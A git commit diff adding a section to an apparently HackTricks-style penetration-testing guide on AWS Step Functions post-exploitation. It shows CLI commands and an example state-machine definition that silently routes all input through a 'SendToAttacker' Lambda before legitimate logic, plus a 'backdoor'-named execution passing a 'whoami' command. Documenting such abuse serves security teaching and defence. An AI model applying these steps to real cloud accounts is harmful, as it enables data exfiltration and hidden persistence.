Update more post exploitation for step function

kluo84 · kluo84 · commit ce8947e87af6 · 2025-03-24T20:29:40.000-05:00
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
@@ -71,6 +71,69 @@ aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
 
 **Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
 
+### `states:UpdateStateMachine`
+
+This permission allows an attacker to **modify the logic of an existing state machine**. By injecting malicious logic into the state definition, the attacker could:
+
+- Add a **new state** that exfiltrates input/output to an external system (via Lambda or SNS).
+- **Bypass security checks**, skip validation steps, or disable error handling.
+- **Insert a logic bomb** that triggers under specific input conditions to disrupt execution.
+
+This attack can be subtle, blending into large state definitions, and may go unnoticed without strict ASL version control.
+
+```bash
+aws stepfunctions update-state-machine \
+  --state-machine-arn <value> \
+  --definition file://malicious_state_definition.json \
+  --role-arn arn:aws:iam::<account-id>:role/<execution-role>
+```
+
+`malicious_state_definition.json`
+
+```json
+{
+  "Comment": "Malicious State Machine - Data Exfiltration",
+  "StartAt": "ExfiltrateSecrets",
+  "States": {
+    "ExfiltrateSecrets": {
+      "Type": "Task",
+      "Resource": "arn:aws:lambda:us-east-1:123456789012:function:SendToAttacker",
+      "InputPath": "$",
+      "ResultPath": "$.exfiltration_result",
+      "Next": "LegitimateStep"
+    },
+    "LegitimateStep": {
+      "Type": "Task",
+      "Resource": "arn:aws:lambda:us-east-1:123456789012:function:LegitBusinessLogic",
+      "End": true
+    }
+  }
+}
+```
+- **Potential Impact**: Data exfiltration, disruption of logic flow, persistent access through hidden states.
+
+---
+
+### `states:StartExecution`
+
+With this permission, an attacker can **trigger executions on demand**, passing arbitrary input to state machines. This allows:
+
+- **Triggering sensitive operations** (e.g., Lambda invocations, EC2 actions) if the workflow handles them.
+- **Supplying attacker-controlled input** to abuse poorly validated states.
+- **Recon of business logic** by probing execution responses or failures.
+
+Used with `states:GetExecutionHistory`, it becomes a powerful tool for **logic discovery**, **abuse**, or **command execution** through embedded Lambdas or activities.
+
+```bash
+aws stepfunctions start-execution \
+  --state-machine-arn <value> \
+  --name "backdoor-$(date +%s)" \
+  --input '{"command":"whoami"}'
+```
+
+- **Potential Impact**: Unauthorized triggering of sensitive workflows, business logic abuse, stealthy persistence (can be cron-triggered via EventBridge).
+
+
 {{#include ../../../banners/hacktricks-training.md}}
 
 
